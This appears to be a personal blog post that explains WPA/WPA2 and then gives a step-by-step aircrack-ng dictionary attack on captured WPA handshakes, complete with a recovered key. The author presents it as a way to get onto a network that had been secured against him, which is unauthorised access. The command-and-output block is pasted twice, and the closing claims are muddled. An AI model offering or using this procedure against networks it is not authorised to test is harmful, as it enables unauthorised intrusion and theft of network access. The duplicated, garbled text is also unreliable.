WHAT IS WPA ??
WPA-It means wifi protected access..:A security method used by wireless networks. WPA encrypts the information that is sent between computers on a wireless network and authenticates users to help ensure that only authorized people can access the network.
WPA was created to improve the security of WEP. Like WEP, WPA encrypts information, but it also checks to make sure that the network security key has not been modified. WPA also authenticates users to help ensure that only authorized people can access the network. If your networking hardware works with both WEP and WPA security, we recommend that you use WPA.
There are two types of WPA authentication: WPA and WPA2. WPA is designed to work with all wireless network adapters, but it might not work with older routers or access points. WPA2 is more secure than WPA, but it will not work with some older network adapters. WPA is designed to be used with an 802.1X authentication server, which distributes different keys to each user. This is referred to as WPA-Enterprise or WPA2-Enterprise. It can also be used in a pre-shared key (PSK) mode, where every user is given the same pass phrase. This is referred to as WPA-Personal or WPA2-Personal.
few terms:
WEP:wired equivalent privacy
WPA:wi fi protected access..
HOW TO CRACK WPA ???
Now onto cracking WPA/WPA2 pass phrases. Aircrack-ng can crack either types.
aircrack-ng -w password.lst *.cap
Where:
-w password.lst is the name of the password file. Remember to specify the full path if the file is not located in the same directory.
*.cap is name of group of files containing the captured packets. Notice in this case that we used the wild card * to include multiple files.
The program responds:
Opening wpa2.eapol.cap
Opening wpa.cap
Read 18 packets.
# BSSID ESSID Encryption
1 00:14:6C:7E:40:80 Harkonen WPA (1 handshake)
2 00:0D:93:EB:B0:8C test WPA (1 handshake)
Index number of target network ?
Notice in this case that since there are multiple networks we need to select which one to attack. We select number 2. The program then responds:
Aircrack-ng 0.7 r130
[00:00:03] 230 keys tested (73.41 k/s)
KEY FOUND! [ biscotte ]
Master Key : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6
39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 B5 55 24 EE
Transcient Key : 33 55 0B FC 4F 24 84 F4 9A 38 B3 D0 89 83 D2 49
73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08
AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97
D9 6F 76 5B 8C D3 DF 13 2F BC DA 6A 6E D9 62 CD
EAPOL HMAC : 52 27 B8 3F 73 7C 45 A0 05 97 69 5C 30 78 60 BD
Now you have the passphrase and can connect to the network.
its in my knowledge coz i have faced a problem personally regarding this i used to get wifi access which was unsecured 1st thn it was later made security enabled..so i had to try my hands on these information..hope it clarifies your doubt...
NOTE:
It can be only cracked by dictionary method..it means if the main master key and transient key hits into its encrypted code it can track and give you the pass phrase...aircrack-ng -w password.lst *.cap
Where:
-w password.lst is the name of the password file. Remember to specify the full path if the file is not located in the same directory.
*.cap is name of group of files containing the captured packets. Notice in this case that we used the wild card * to include multiple files.
The program responds:
Opening wpa2.eapol.cap
Opening wpa.cap
Read 18 packets.
# BSSID ESSID Encryption
1 00:14:6C:7E:40:80 Harkonen WPA (1 handshake)
2 00:0D:93:EB:B0:8C test WPA (1 handshake)
Index number of target network ?
Notice in this case that since there are multiple networks we need to select which one to attack. We select number 2. The program then responds:
Aircrack-ng 0.7 r130
[00:00:03] 230 keys tested (73.41 k/s)
KEY FOUND! [ biscotte ]
Master Key : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6
39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 B5 55 24 EE
Transcient Key : 33 55 0B FC 4F 24 84 F4 9A 38 B3 D0 89 83 D2 49
73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08
AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97
D9 6F 76 5B 8C D3 DF 13 2F BC DA 6A 6E D9 62 CD
EAPOL HMAC : 52 27 B8 3F 73 7C 45 A0 05 97 69 5C 30 78 60 BD
Now you have the passphrase and can connect to the network.
its in my knowledge coz i have faced a problem personally regarding this i used to get wifi access which was unsecured 1st thn it was later made security enabled..so i had to try my hands on these information..hope it clarifies your doubt...
NOTE:
because it uses pass phrase not password!!!! so its tracking vulnerability is 10-30%!!!!!
No comments:
Post a Comment